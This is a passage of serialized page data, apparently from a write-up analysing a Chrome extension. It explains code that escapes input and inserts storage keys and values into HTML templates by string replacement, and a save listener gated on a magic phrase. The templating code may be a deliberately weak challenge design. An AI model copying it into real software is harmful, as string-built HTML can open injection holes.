},[16245],{"
type":38,"value":6889},{"type":33,"tag":128,"props":16247,"children":16248},{"style":312},[16249],{"type":38,"value":2966},{"type":33,"tag":128,"props":16251,"children":16252},{"style":312},[16253],{"type":38,"value":762},{"type":33,"tag":128,"props":16255,"children":16256},{"class":130,"line":1226},[16257,16261,16265,16269,16273,16277,16282,16286,16290,16294],{"type":33,"tag":128,"props":16258,"children":16259},{"style":306},[16260],{"type":38,"value":13664},{"type":33,"tag":128,"props":16262,"children":16263},{"style":312},[16264],{"type":38,"value":215},{"type":33,"tag":128,"props":16266,"children":16267},{"style":135},[16268],{"type":38,"value":13157},{"type":33,"tag":128,"props":16270,"children":16271},{"style":312},[16272],{"type":38,"value":5566},{"type":33,"tag":128,"props":16274,"children":16275},{"style":676},[16276],{"type":38,"value":6040},{"type":33,"tag":128,"props":16278,"children":16279},{"style":140},[16280],{"type":38,"value":16281},"Error loading data",{"type":33,"tag":128,"props":16283,"children":16284},{"style":676},[16285],{"type":38,"value":6040},{"type":33,"tag":128,"props":16287,"children":16288},{"style":312},[16289],{"type":38,"value":5584},{"type":33,"tag":128,"props":16291,"children":16292},{"style":306},[16293],{"type":38,"value":14251},{"type":33,"tag":128,"props":16295,"children":16296},{"style":312},[16297],{"type":38,"value":5815},{"type":33,"tag":128,"props":16299,"children":16300},{"class":130,"line":1239},[16301,16306],{"type":33,"tag":128,"props":16302,"children":16303},{"style":1576},[16304],{"type":38,"value":16305},"      
continue",{"type":33,"tag":128,"props":16307,"children":16308},{"style":312},[16309],{"type":38,"value":5676},{"type":33,"tag":128,"props":16311,"children":16312},{"class":130,"line":1251},[16313],{"type":33,"tag":128,"props":16314,"children":16315},{"style":312},[16316],{"type":38,"value":6760},{"type":33,"tag":128,"props":16318,"children":16319},{"class":130,"line":1263},[16320],{"type":33,"tag":128,"props":16321,"children":16322},{"style":312},[16323],{"type":38,"value":845},{"type":33,"tag":128,"props":16325,"children":16326},{"class":130,"line":1276},[16327],{"type":33,"tag":128,"props":16328,"children":16329},{"style":312},[16330],{"type":38,"value":854},{"type":33,"tag":47,"props":16332,"children":16333},{},[16334,16335,16340,16342,16348,16350,16356,16357,16363,16365,16371],{"type":38,"value":2766},{"type":33,"tag":105,"props":16336,"children":16338},{"className":16337},[],[16339],{"type":38,"value":15555},{"type":38,"value":16341}," function takes as input the key and value from the Chrome storage as well as the outerHTML element of the HTML input element that will be modified.\nIt performs modifications and substitutions using JavaScript's ",{"type":33,"tag":105,"props":16343,"children":16345},{"className":16344},[],[16346],{"type":38,"value":16347},"replace()",{"type":38,"value":16349}," methods and custom templates (",{"type":33,"tag":105,"props":16351,"children":16353},{"className":16352},[],[16354],{"type":38,"value":16355},"{{KEY}}",{"type":38,"value":6345},{"type":33,"tag":105,"props":16358,"children":16360},{"className":16359},[],[16361],{"type":38,"value":16362},"{{VALUE}}",{"type":38,"value":16364},") which will be added via the ",{"type":33,"tag":105,"props":16366,"children":16368},{"className":16367},[],[16369],{"type":38,"value":16370},"getInputTemplateFromOuterHTML()",{"type":38,"value":16372}," 
function.",{"type":33,"tag":114,"props":16374,"children":16375},{"lang":5526},[16376],{"type":33,"tag":119,"props":16377,"children":16379},{"className":5530,"code":16378,"language":5526,"meta":8,"style":8},"function getInputTemplateFromOuterHTML(outerHTML){\n  if (!outerHTML.includes('value=')) {\n    outerHTML = outerHTML.replace('>', ' value=\"\">');\n  }\n  return outerHTML.replace(/name=\".*?\"/, 'name=\"{{KEY}}\"').replace(/value=\".*?\"/, 'value=\"{{VALUE}}\"');\n}\n\nfunction input(key, value, outerHTML) {\n  key = key.replace(/\u003C/g, '&lt;').replace(/>/g, '&gt;').replace(/\"/g, '&quot;')\n  value = value.replace(/\u003C/g, '&lt;').replace(/>/g, '&gt;').replace(/\"/g, '&quot;')\n  const template = getInputTemplateFromOuterHTML(outerHTML);\n  return template.replace('{{KEY}}', key).replace('{{VALUE}}', value);\n}\n",[16380],{"type":33,"tag":105,"props":16381,"children":16382},{"__ignoreMap":8},[16383,16408,16462,16525,16532,16658,16665,16672,16715,16869,17021,17053,17132],{"type":33,"tag":128,"props":16384,"children":16385},{"class":130,"line":131},[16386,16390,16395,16399,16403],{"type":33,"tag":128,"props":16387,"children":16388},{"style":300},[16389],{"type":38,"value":13008},{"type":33,"tag":128,"props":16391,"children":16392},{"style":135},[16393],{"type":38,"value":16394}," getInputTemplateFromOuterHTML",{"type":33,"tag":128,"props":16396,"children":16397},{"style":312},[16398],{"type":38,"value":5566},{"type":33,"tag":128,"props":16400,"children":16401},{"style":306},[16402],{"type":38,"value":16154},{"type":33,"tag":128,"props":16404,"children":16405},{"style":312},[16406],{"type":38,"value":16407},"){\n",{"type":33,"tag":128,"props":16409,"children":16410},{"class":130,"line":362},[16411,16416,16420,16425,16429,16433,16437,16441,16445,16450,16454,16458],{"type":33,"tag":128,"props":16412,"children":16413},{"style":1576},[16414],{"type":38,"value":16415},"  
if",{"type":33,"tag":128,"props":16417,"children":16418},{"style":312},[16419],{"type":38,"value":2852},{"type":33,"tag":128,"props":16421,"children":16422},{"style":300},[16423],{"type":38,"value":16424},"!",{"type":33,"tag":128,"props":16426,"children":16427},{"style":306},[16428],{"type":38,"value":16154},{"type":33,"tag":128,"props":16430,"children":16431},{"style":312},[16432],{"type":38,"value":215},{"type":33,"tag":128,"props":16434,"children":16435},{"style":135},[16436],{"type":38,"value":6957},{"type":33,"tag":128,"props":16438,"children":16439},{"style":312},[16440],{"type":38,"value":5566},{"type":33,"tag":128,"props":16442,"children":16443},{"style":676},[16444],{"type":38,"value":6040},{"type":33,"tag":128,"props":16446,"children":16447},{"style":140},[16448],{"type":38,"value":16449},"value=",{"type":33,"tag":128,"props":16451,"children":16452},{"style":676},[16453],{"type":38,"value":6040},{"type":33,"tag":128,"props":16455,"children":16456},{"style":312},[16457],{"type":38,"value":7088},{"type":33,"tag":128,"props":16459,"children":16460},{"style":312},[16461],{"type":38,"value":762},{"type":33,"tag":128,"props":16463,"children":16464},{"class":130,"line":403},[16465,16470,16474,16479,16483,16488,16492,16496,16500,16504,16508,16512,16517,16521],{"type":33,"tag":128,"props":16466,"children":16467},{"style":306},[16468],{"type":38,"value":16469},"    outerHTML",{"type":33,"tag":128,"props":16471,"children":16472},{"style":312},[16473],{"type":38,"value":5657},{"type":33,"tag":128,"props":16475,"children":16476},{"style":306},[16477],{"type":38,"value":16478}," 
outerHTML",{"type":33,"tag":128,"props":16480,"children":16481},{"style":312},[16482],{"type":38,"value":215},{"type":33,"tag":128,"props":16484,"children":16485},{"style":135},[16486],{"type":38,"value":16487},"replace",{"type":33,"tag":128,"props":16489,"children":16490},{"style":312},[16491],{"type":38,"value":5566},{"type":33,"tag":128,"props":16493,"children":16494},{"style":676},[16495],{"type":38,"value":6040},{"type":33,"tag":128,"props":16497,"children":16498},{"style":140},[16499],{"type":38,"value":6054},{"type":33,"tag":128,"props":16501,"children":16502},{"style":676},[16503],{"type":38,"value":6040},{"type":33,"tag":128,"props":16505,"children":16506},{"style":312},[16507],{"type":38,"value":5584},{"type":33,"tag":128,"props":16509,"children":16510},{"style":676},[16511],{"type":38,"value":6739},{"type":33,"tag":128,"props":16513,"children":16514},{"style":140},[16515],{"type":38,"value":16516}," value=\"\">",{"type":33,"tag":128,"props":16518,"children":16519},{"style":676},[16520],{"type":38,"value":6040},{"type":33,"tag":128,"props":16522,"children":16523},{"style":312},[16524],{"type":38,"value":5815},{"type":33,"tag":128,"props":16526,"children":16527},{"class":130,"line":739},[16528],{"type":33,"tag":128,"props":16529,"children":16530},{"style":312},[16531],{"type":38,"value":845},{"type":33,"tag":128,"props":16533,"children":16534},{"class":130,"line":765},[16535,16539,16543,16547,16551,16555,16559,16565,16570,16575,16579,16583,16587,16591,16596,16600,16604,16608,16612,16616,16621,16625,16629,16633,16637,16641,16645,16650,16654],{"type":33,"tag":128,"props":16536,"children":16537},{"style":1576},[16538],{"type":38,"value":13056},{"type":33,"tag":128,"props":16540,"children":16541},{"style":306},[16542],{"type":38,"value":16478},{"type":33,"tag":128,"props":16544,"children":16545},{"style":312},[16546],{"type":38,"value":215},{"type":33,"tag":128,"props":16548,"children":16549},{"style":135},[16550],{"type":38,"value":16487},{"type":33,"tag":128,
"props":16552,"children":16553},{"style":312},[16554],{"type":38,"value":5566},{"type":33,"tag":128,"props":16556,"children":16557},{"style":676},[16558],{"type":38,"value":7367},{"type":33,"tag":128,"props":16560,"children":16562},{"style":16561},"--shiki-default:#C4704F",[16563],{"type":38,"value":16564},"name=\"",{"type":33,"tag":128,"props":16566,"children":16568},{"style":16567},"--shiki-default:#6872AB",[16569],{"type":38,"value":215},{"type":33,"tag":128,"props":16571,"children":16572},{"style":523},[16573],{"type":38,"value":16574},"*?",{"type":33,"tag":128,"props":16576,"children":16577},{"style":16561},[16578],{"type":38,"value":669},{"type":33,"tag":128,"props":16580,"children":16581},{"style":676},[16582],{"type":38,"value":7367},{"type":33,"tag":128,"props":16584,"children":16585},{"style":312},[16586],{"type":38,"value":5584},{"type":33,"tag":128,"props":16588,"children":16589},{"style":676},[16590],{"type":38,"value":6739},{"type":33,"tag":128,"props":16592,"children":16593},{"style":140},[16594],{"type":38,"value":16595},"name=\"{{KEY}}\"",{"type":33,"tag":128,"props":16597,"children":16598},{"style":676},[16599],{"type":38,"value":6040},{"type":33,"tag":128,"props":16601,"children":16602},{"style":312},[16603],{"type":38,"value":6700},{"type":33,"tag":128,"props":16605,"children":16606},{"style":135},[16607],{"type":38,"value":16487},{"type":33,"tag":128,"props":16609,"children":16610},{"style":312},[16611],{"type":38,"value":5566},{"type":33,"tag":128,"props":16613,"children":16614},{"style":676},[16615],{"type":38,"value":7367},{"type":33,"tag":128,"props":16617,"children":16618},{"style":16561},[16619],{"type":38,"value":16620},"value=\"",{"type":33,"tag":128,"props":16622,"children":16623},{"style":16567},[16624],{"type":38,"value":215},{"type":33,"tag":128,"props":16626,"children":16627},{"style":523},[16628],{"type":38,"value":16574},{"type":33,"tag":128,"props":16630,"children":16631},{"style":16561},[16632],{"type":38,"value":669},{"type":33
,"tag":128,"props":16634,"children":16635},{"style":676},[16636],{"type":38,"value":7367},{"type":33,"tag":128,"props":16638,"children":16639},{"style":312},[16640],{"type":38,"value":5584},{"type":33,"tag":128,"props":16642,"children":16643},{"style":676},[16644],{"type":38,"value":6739},{"type":33,"tag":128,"props":16646,"children":16647},{"style":140},[16648],{"type":38,"value":16649},"value=\"{{VALUE}}\"",{"type":33,"tag":128,"props":16651,"children":16652},{"style":676},[16653],{"type":38,"value":6040},{"type":33,"tag":128,"props":16655,"children":16656},{"style":312},[16657],{"type":38,"value":5815},{"type":33,"tag":128,"props":16659,"children":16660},{"class":130,"line":804},[16661],{"type":33,"tag":128,"props":16662,"children":16663},{"style":312},[16664],{"type":38,"value":854},{"type":33,"tag":128,"props":16666,"children":16667},{"class":130,"line":839},[16668],{"type":33,"tag":128,"props":16669,"children":16670},{"emptyLinePlaceholder":896},[16671],{"type":38,"value":899},{"type":33,"tag":128,"props":16673,"children":16674},{"class":130,"line":848},[16675,16679,16683,16687,16691,16695,16699,16703,16707,16711],{"type":33,"tag":128,"props":16676,"children":16677},{"style":300},[16678],{"type":38,"value":13008},{"type":33,"tag":128,"props":16680,"children":16681},{"style":135},[16682],{"type":38,"value":16183},{"type":33,"tag":128,"props":16684,"children":16685},{"style":312},[16686],{"type":38,"value":5566},{"type":33,"tag":128,"props":16688,"children":16689},{"style":306},[16690],{"type":38,"value":13022},{"type":33,"tag":128,"props":16692,"children":16693},{"style":312},[16694],{"type":38,"value":5584},{"type":33,"tag":128,"props":16696,"children":16697},{"style":306},[16698],{"type":38,"value":13031},{"type":33,"tag":128,"props":16700,"children":16701},{"style":312},[16702],{"type":38,"value":5584},{"type":33,"tag":128,"props":16704,"children":16705},{"style":306},[16706],{"type":38,"value":16478},{"type":33,"tag":128,"props":16708,"children":16709},{"st
yle":312},[16710],{"type":38,"value":2966},{"type":33,"tag":128,"props":16712,"children":16713},{"style":312},[16714],{"type":38,"value":762},{"type":33,"tag":128,"props":16716,"children":16717},{"class":130,"line":976},[16718,16723,16727,16731,16735,16739,16743,16747,16751,16755,16760,16764,16768,16772,16776,16780,16784,16788,16792,16796,16800,16804,16808,16812,16817,16821,16825,16829,16833,16837,16841,16845,16849,16853,16857,16861,16865],{"type":33,"tag":128,"props":16719,"children":16720},{"style":306},[16721],{"type":38,"value":16722},"  key",{"type":33,"tag":128,"props":16724,"children":16725},{"style":312},[16726],{"type":38,"value":5657},{"type":33,"tag":128,"props":16728,"children":16729},{"style":306},[16730],{"type":38,"value":5027},{"type":33,"tag":128,"props":16732,"children":16733},{"style":312},[16734],{"type":38,"value":215},{"type":33,"tag":128,"props":16736,"children":16737},{"style":135},[16738],{"type":38,"value":16487},{"type":33,"tag":128,"props":16740,"children":16741},{"style":312},[16742],{"type":38,"value":5566},{"type":33,"tag":128,"props":16744,"children":16745},{"style":676},[16746],{"type":38,"value":7367},{"type":33,"tag":128,"props":16748,"children":16749},{"style":16561},[16750],{"type":38,"value":5977},{"type":33,"tag":128,"props":16752,"children":16753},{"style":676},[16754],{"type":38,"value":7367},{"type":33,"tag":128,"props":16756,"children":16757},{"style":1576},[16758],{"type":38,"value":16759},"g",{"type":33,"tag":128,"props":16761,"children":16762},{"style":312},[16763],{"type":38,"value":5584},{"type":33,"tag":128,"props":16765,"children":16766},{"style":676},[16767],{"type":38,"value":6739},{"type":33,"tag":128,"props":16769,"children":16770},{"style":140},[16771],{"type":38,"value":6351},{"type":33,"tag":128,"props":16773,"children":16774},{"style":676},[16775],{"type":38,"value":6040},{"type":33,"tag":128,"props":16777,"children":16778},{"style":312},[16779],{"type":38,"value":6700},{"type":33,"tag":128,"props":16781,"chi
ldren":16782},{"style":135},[16783],{"type":38,"value":16487},{"type":33,"tag":128,"props":16785,"children":16786},{"style":312},[16787],{"type":38,"value":5566},{"type":33,"tag":128,"props":16789,"children":16790},{"style":676},[16791],{"type":38,"value":7367},{"type":33,"tag":128,"props":16793,"children":16794},{"style":16561},[16795],{"type":38,"value":6054},{"type":33,"tag":128,"props":16797,"children":16798},{"style":676},[16799],{"type":38,"value":7367},{"type":33,"tag":128,"props":16801,"children":16802},{"style":1576},[16803],{"type":38,"value":16759},{"type":33,"tag":128,"props":16805,"children":16806},{"style":312},[16807],{"type":38,"value":5584},{"type":33,"tag":128,"props":16809,"children":16810},{"style":676},[16811],{"type":38,"value":6739},{"type":33,"tag":128,"props":16813,"children":16814},{"style":140},[16815],{"type":38,"value":16816},"&gt;",{"type":33,"tag":128,"props":16818,"children":16819},{"style":676},[16820],{"type":38,"value":6040},{"type":33,"tag":128,"props":16822,"children":16823},{"style":312},[16824],{"type":38,"value":6700},{"type":33,"tag":128,"props":16826,"children":16827},{"style":135},[16828],{"type":38,"value":16487},{"type":33,"tag":128,"props":16830,"children":16831},{"style":312},[16832],{"type":38,"value":5566},{"type":33,"tag":128,"props":16834,"children":16835},{"style":676},[16836],{"type":38,"value":7367},{"type":33,"tag":128,"props":16838,"children":16839},{"style":16561},[16840],{"type":38,"value":669},{"type":33,"tag":128,"props":16842,"children":16843},{"style":676},[16844],{"type":38,"value":7367},{"type":33,"tag":128,"props":16846,"children":16847},{"style":1576},[16848],{"type":38,"value":16759},{"type":33,"tag":128,"props":16850,"children":16851},{"style":312},[16852],{"type":38,"value":5584},{"type":33,"tag":128,"props":16854,"children":16855},{"style":676},[16856],{"type":38,"value":6739},{"type":33,"tag":128,"props":16858,"children":16859},{"style":140},[16860],{"type":38,"value":6359},{"type":33,"tag":128,"
props":16862,"children":16863},{"style":676},[16864],{"type":38,"value":6040},{"type":33,"tag":128,"props":16866,"children":16867},{"style":312},[16868],{"type":38,"value":2427},{"type":33,"tag":128,"props":16870,"children":16871},{"class":130,"line":988},[16872,16877,16881,16885,16889,16893,16897,16901,16905,16909,16913,16917,16921,16925,16929,16933,16937,16941,16945,16949,16953,16957,16961,16965,16969,16973,16977,16981,16985,16989,16993,16997,17001,17005,17009,17013,17017],{"type":33,"tag":128,"props":16873,"children":16874},{"style":306},[16875],{"type":38,"value":16876},"  value",{"type":33,"tag":128,"props":16878,"children":16879},{"style":312},[16880],{"type":38,"value":5657},{"type":33,"tag":128,"props":16882,"children":16883},{"style":306},[16884],{"type":38,"value":13031},{"type":33,"tag":128,"props":16886,"children":16887},{"style":312},[16888],{"type":38,"value":215},{"type":33,"tag":128,"props":16890,"children":16891},{"style":135},[16892],{"type":38,"value":16487},{"type":33,"tag":128,"props":16894,"children":16895},{"style":312},[16896],{"type":38,"value":5566},{"type":33,"tag":128,"props":16898,"children":16899},{"style":676},[16900],{"type":38,"value":7367},{"type":33,"tag":128,"props":16902,"children":16903},{"style":16561},[16904],{"type":38,"value":5977},{"type":33,"tag":128,"props":16906,"children":16907},{"style":676},[16908],{"type":38,"value":7367},{"type":33,"tag":128,"props":16910,"children":16911},{"style":1576},[16912],{"type":38,"value":16759},{"type":33,"tag":128,"props":16914,"children":16915},{"style":312},[16916],{"type":38,"value":5584},{"type":33,"tag":128,"props":16918,"children":16919},{"style":676},[16920],{"type":38,"value":6739},{"type":33,"tag":128,"props":16922,"children":16923},{"style":140},[16924],{"type":38,"value":6351},{"type":33,"tag":128,"props":16926,"children":16927},{"style":676},[16928],{"type":38,"value":6040},{"type":33,"tag":128,"props":16930,"children":16931},{"style":312},[16932],{"type":38,"value":6700},{"ty
pe":33,"tag":128,"props":16934,"children":16935},{"style":135},[16936],{"type":38,"value":16487},{"type":33,"tag":128,"props":16938,"children":16939},{"style":312},[16940],{"type":38,"value":5566},{"type":33,"tag":128,"props":16942,"children":16943},{"style":676},[16944],{"type":38,"value":7367},{"type":33,"tag":128,"props":16946,"children":16947},{"style":16561},[16948],{"type":38,"value":6054},{"type":33,"tag":128,"props":16950,"children":16951},{"style":676},[16952],{"type":38,"value":7367},{"type":33,"tag":128,"props":16954,"children":16955},{"style":1576},[16956],{"type":38,"value":16759},{"type":33,"tag":128,"props":16958,"children":16959},{"style":312},[16960],{"type":38,"value":5584},{"type":33,"tag":128,"props":16962,"children":16963},{"style":676},[16964],{"type":38,"value":6739},{"type":33,"tag":128,"props":16966,"children":16967},{"style":140},[16968],{"type":38,"value":16816},{"type":33,"tag":128,"props":16970,"children":16971},{"style":676},[16972],{"type":38,"value":6040},{"type":33,"tag":128,"props":16974,"children":16975},{"style":312},[16976],{"type":38,"value":6700},{"type":33,"tag":128,"props":16978,"children":16979},{"style":135},[16980],{"type":38,"value":16487},{"type":33,"tag":128,"props":16982,"children":16983},{"style":312},[16984],{"type":38,"value":5566},{"type":33,"tag":128,"props":16986,"children":16987},{"style":676},[16988],{"type":38,"value":7367},{"type":33,"tag":128,"props":16990,"children":16991},{"style":16561},[16992],{"type":38,"value":669},{"type":33,"tag":128,"props":16994,"children":16995},{"style":676},[16996],{"type":38,"value":7367},{"type":33,"tag":128,"props":16998,"children":16999},{"style":1576},[17000],{"type":38,"value":16759},{"type":33,"tag":128,"props":17002,"children":17003},{"style":312},[17004],{"type":38,"value":5584},{"type":33,"tag":128,"props":17006,"children":17007},{"style":676},[17008],{"type":38,"value":6739},{"type":33,"tag":128,"props":17010,"children":17011},{"style":140},[17012],{"type":38,"value":
6359},{"type":33,"tag":128,"props":17014,"children":17015},{"style":676},[17016],{"type":38,"value":6040},{"type":33,"tag":128,"props":17018,"children":17019},{"style":312},[17020],{"type":38,"value":2427},{"type":33,"tag":128,"props":17022,"children":17023},{"class":130,"line":1001},[17024,17028,17033,17037,17041,17045,17049],{"type":33,"tag":128,"props":17025,"children":17026},{"style":300},[17027],{"type":38,"value":5637},{"type":33,"tag":128,"props":17029,"children":17030},{"style":306},[17031],{"type":38,"value":17032}," template",{"type":33,"tag":128,"props":17034,"children":17035},{"style":312},[17036],{"type":38,"value":5657},{"type":33,"tag":128,"props":17038,"children":17039},{"style":135},[17040],{"type":38,"value":16394},{"type":33,"tag":128,"props":17042,"children":17043},{"style":312},[17044],{"type":38,"value":5566},{"type":33,"tag":128,"props":17046,"children":17047},{"style":306},[17048],{"type":38,"value":16154},{"type":33,"tag":128,"props":17050,"children":17051},{"style":312},[17052],{"type":38,"value":5815},{"type":33,"tag":128,"props":17054,"children":17055},{"class":130,"line":1014},[17056,17060,17064,17068,17072,17076,17080,17084,17088,17092,17096,17100,17104,17108,17112,17116,17120,17124,17128],{"type":33,"tag":128,"props":17057,"children":17058},{"style":1576},[17059],{"type":38,"value":13056},{"type":33,"tag":128,"props":17061,"children":17062},{"style":306},[17063],{"type":38,"value":17032},{"type":33,"tag":128,"props":17065,"children":17066},{"style":312},[17067],{"type":38,"value":215},{"type":33,"tag":128,"props":17069,"children":17070},{"style":135},[17071],{"type":38,"value":16487},{"type":33,"tag":128,"props":17073,"children":17074},{"style":312},[17075],{"type":38,"value":5566},{"type":33,"tag":128,"props":17077,"children":17078},{"style":676},[17079],{"type":38,"value":6040},{"type":33,"tag":128,"props":17081,"children":17082},{"style":140},[17083],{"type":38,"value":16355},{"type":33,"tag":128,"props":17085,"children":17086},{"st
yle":676},[17087],{"type":38,"value":6040},{"type":33,"tag":128,"props":17089,"children":17090},{"style":312},[17091],{"type":38,"value":5584},{"type":33,"tag":128,"props":17093,"children":17094},{"style":306},[17095],{"type":38,"value":5027},{"type":33,"tag":128,"props":17097,"children":17098},{"style":312},[17099],{"type":38,"value":6700},{"type":33,"tag":128,"props":17101,"children":17102},{"style":135},[17103],{"type":38,"value":16487},{"type":33,"tag":128,"props":17105,"children":17106},{"style":312},[17107],{"type":38,"value":5566},{"type":33,"tag":128,"props":17109,"children":17110},{"style":676},[17111],{"type":38,"value":6040},{"type":33,"tag":128,"props":17113,"children":17114},{"style":140},[17115],{"type":38,"value":16362},{"type":33,"tag":128,"props":17117,"children":17118},{"style":676},[17119],{"type":38,"value":6040},{"type":33,"tag":128,"props":17121,"children":17122},{"style":312},[17123],{"type":38,"value":5584},{"type":33,"tag":128,"props":17125,"children":17126},{"style":306},[17127],{"type":38,"value":13031},{"type":33,"tag":128,"props":17129,"children":17130},{"style":312},[17131],{"type":38,"value":5815},{"type":33,"tag":128,"props":17133,"children":17134},{"class":130,"line":1026},[17135],{"type":33,"tag":128,"props":17136,"children":17137},{"style":312},[17138],{"type":38,"value":854},{"type":33,"tag":47,"props":17140,"children":17141},{},[17142,17144,17150],{"type":38,"value":17143},"The save function listens for the change event of each input and updates the Chrome storage using the input's name attribute (event.target.name) as the storage key and the input's value as the stored value. 
The value being saved must contain the string ",{"type":33,"tag":105,"props":17145,"children":17147},{"className":17146},[],[17148],{"type":38,"value":17149},"shikanoko nokonoko koshitantan",{"type":38,"value":17151},"; otherwise the change listener returns early and nothing is written to storage.",{"type":33,"tag":114,"props":17153,"children":17154},{"lang":5526},[17155],{"type":33,"tag":119,"props":17156,"children":17158},{"className":5530,"code":17157,"language":5526,"meta":8,"style":8},"\nfunction save(data) {\n  return new Promise((resolve) => {\n    chrome.runtime.sendMessage(\n      {\n        type: 'SAVE',\n        payload: data,\n      },\n      response => {\n        resolve(response);\n      }\n    );\n  })\n}\n\nasync function saves() {\n  var inputs = document.querySelectorAll('input');\n  for (const input of inputs) {\n    input.addEventListener('change', async function (event) {\n      const key = event.target.name;\n      const value = event.target.value;\n      if (!value.includes(\"shikanoko nokonoko koshitantan\")){\n        return\n      }\n      try {\n        await save({ key, value });\n        console.log('Data saved');\n      } catch (error) {\n        console.log('Error saving data', error);\n      }\n    });\n  
}\n}\n",[17159],{"type":33,"tag":105,"props":17160,"children":17161},{"__ignoreMap":8},[17162,17169,17196,17231,17258,17265,17292,17311,17318,17333,17352,17359,17366,17373,17380,17387,17410,17457,17492,17555,17597,17636,17684,17692,17699,17711,17743,17779,17807,17851,17858,17865,17872],{"type":33,"tag":128,"props":17163,"children":17164},{"class":130,"line":131},[17165],{"type":33,"tag":128,"props":17166,"children":17167},{"emptyLinePlaceholder":896},[17168],{"type":38,"value":899},{"type":33,"tag":128,"props":17170,"children":17171},{"class":130,"line":362},[17172,17176,17180,17184,17188,17192],{"type":33,"tag":128,"props":17173,"children":17174},{"style":300},[17175],{"type":38,"value":13008},{"type":33,"tag":128,"props":17177,"children":17178},{"style":135},[17179],{"type":38,"value":13013},{"type":33,"tag":128,"props":17181,"children":17182},{"style":312},[17183],{"type":38,"value":5566},{"type":33,"tag":128,"props":17185,"children":17186},{"style":306},[17187],{"type":38,"value":2815},{"type":33,"tag":128,"props":17189,"children":17190},{"style":312},[17191],{"type":38,"value":2966},{"type":33,"tag":128,"props":17193,"children":17194},{"style":312},[17195],{"type":38,"value":762},{"type":33,"tag":128,"props":17197,"children":17198},{"class":130,"line":403},[17199,17203,17207,17211,17215,17219,17223,17227],{"type":33,"tag":128,"props":17200,"children":17201},{"style":1576},[17202],{"type":38,"value":13056},{"type":33,"tag":128,"props":17204,"children":17205},{"style":300},[17206],{"type":38,"value":13061},{"type":33,"tag":128,"props":17208,"children":17209},{"style":437},[17210],{"type":38,"value":13066},{"type":33,"tag":128,"props":17212,"children":17213},{"style":312},[17214],{"type":38,"value":13071},{"type":33,"tag":128,"props":17216,"children":17217},{"style":306},[17218],{"type":38,"value":13076},{"type":33,"tag":128,"props":17220,"children":17221},{"style":312},[17222],{"type":38,"value":2966},{"type":33,"tag":128,"props":17224,"children":17225},{"style":
312},[17226],{"type":38,"value":5625},{"type":33,"tag":128,"props":17228,"children":17229},{"style":312},[17230],{"type":38,"value":762},{"type":33,"tag":128,"props":17232,"children":17233},{"class":130,"line":739},[17234,17238,17242,17246,17250,17254],{"type":33,"tag":128,"props":17235,"children":17236},{"style":306},[17237],{"type":38,"value":13202},{"type":33,"tag":128,"props":17239,"children":17240},{"style":312},[17241],{"type":38,"value":215},{"type":33,"tag":128,"props":17243,"children":17244},{"style":306},[17245],{"type":38,"value":13784},{"type":33,"tag":128,"props":17247,"children":17248},{"style":312},[17249],{"type":38,"value":215},{"type":33,"tag":128,"props":17251,"children":17252},{"style":135},[17253],{"type":38,"value":15668},{"type":33,"tag":128,"props":17255,"children":17256},{"style":312},[17257],{"type":38,"value":15673},{"type":33,"tag":128,"props":17259,"children":17260},{"class":130,"line":765},[17261],{"type":33,"tag":128,"props":17262,"children":17263},{"style":312},[17264],{"type":38,"value":15681},{"type":33,"tag":128,"props":17266,"children":17267},{"class":130,"line":804},[17268,17272,17276,17280,17284,17288],{"type":33,"tag":128,"props":17269,"children":17270},{"style":437},[17271],{"type":38,"value":15689},{"type":33,"tag":128,"props":17273,"children":17274},{"style":312},[17275],{"type":38,"value":284},{"type":33,"tag":128,"props":17277,"children":17278},{"style":676},[17279],{"type":38,"value":6739},{"type":33,"tag":128,"props":17281,"children":17282},{"style":140},[17283],{"type":38,"value":14091},{"type":33,"tag":128,"props":17285,"children":17286},{"style":676},[17287],{"type":38,"value":6040},{"type":33,"tag":128,"props":17289,"children":17290},{"style":312},[17291],{"type":38,"value":693},{"type":33,"tag":128,"props":17293,"children":17294},{"class":130,"line":839},[17295,17299,17303,17307],{"type":33,"tag":128,"props":17296,"children":17297},{"style":437},[17298],{"type":38,"value":15717},{"type":33,"tag":128,"props":17300,"c
hildren":17301},{"style":312},[17302],{"type":38,"value":284},{"type":33,"tag":128,"props":17304,"children":17305},{"style":306},[17306],{"type":38,"value":13545},{"type":33,"tag":128,"props":17308,"children":17309},{"style":312},[17310],{"type":38,"value":693},{"type":33,"tag":128,"props":17312,"children":17313},{"class":130,"line":848},[17314],{"type":33,"tag":128,"props":17315,"children":17316},{"style":312},[17317],{"type":38,"value":15742},{"type":33,"tag":128,"props":17319,"children":17320},{"class":130,"line":976},[17321,17325,17329],{"type":33,"tag":128,"props":17322,"children":17323},{"style":306},[17324],{"type":38,"value":15750},{"type":33,"tag":128,"props":17326,"children":17327},{"style":312},[17328],{"type":38,"value":5625},{"type":33,"tag":128,"props":17330,"children":17331},{"style":312},[17332],{"type":38,"value":762},{"type":33,"tag":128,"props":17334,"children":17335},{"class":130,"line":988},[17336,17340,17344,17348],{"type":33,"tag":128,"props":17337,"children":17338},{"style":135},[17339],{"type":38,"value":15836},{"type":33,"tag":128,"props":17341,"children":17342},{"style":312},[17343],{"type":38,"value":5566},{"type":33,"tag":128,"props":17345,"children":17346},{"style":306},[17347],{"type":38,"value":14194},{"type":33,"tag":128,"props":17349,"children":17350},{"style":312},[17351],{"type":38,"value":5815},{"type":33,"tag":128,"props":17353,"children":17354},{"class":130,"line":1001},[17355],{"type":33,"tag":128,"props":17356,"children":17357},{"style":312},[17358],{"type":38,"value":13656},{"type":33,"tag":128,"props":17360,"children":17361},{"class":130,"line":1014},[17362],{"type":33,"tag":128,"props":17363,"children":17364},{"style":312},[17365],{"type":38,"value":15863},{"type":33,"tag":128,"props":17367,"children":17368},{"class":130,"line":1026},[17369],{"type":33,"tag":128,"props":17370,"children":17371},{"style":312},[17372],{"type":38,"value":13321},{"type":33,"tag":128,"props":17374,"children":17375},{"class":130,"line":1038},[173
